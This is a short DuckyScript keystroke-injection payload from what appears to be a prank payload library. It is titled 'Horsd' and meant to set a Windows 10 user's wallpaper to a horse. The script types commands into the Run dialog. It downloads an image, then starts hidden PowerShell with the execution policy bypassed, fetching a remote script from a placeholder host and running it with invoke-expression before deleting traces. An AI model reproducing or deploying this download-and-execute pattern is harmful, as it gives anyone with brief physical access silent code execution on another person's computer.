Path: blob/master/payloads/library/prank/Horsd/payload.txt
2968 views
REM Title: Horsd1REM Author: MocconaCoffee2REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.3REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)4REM Target OS: Windows 105REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.6DEFINE #SCRIPTURL example.com78DELAY 30009GUI r10DELAY 30011STRING powershell12ENTER13DELAY 30014STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg15ENTER16DELAY 10017STRING exit18ENTER19DELAY 100020GUI r21DELAY 30022STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #SCRIPTURL/horsd.ps1?dl=1; invoke-expression $pl23ENTER24DELAY 100025GUI r26DELAY 30027STRING powershell28ENTER29DELAY 30030STRING Remove-Item horse.jpg31ENTER32DELAY 30033STRING exit34ENTER353637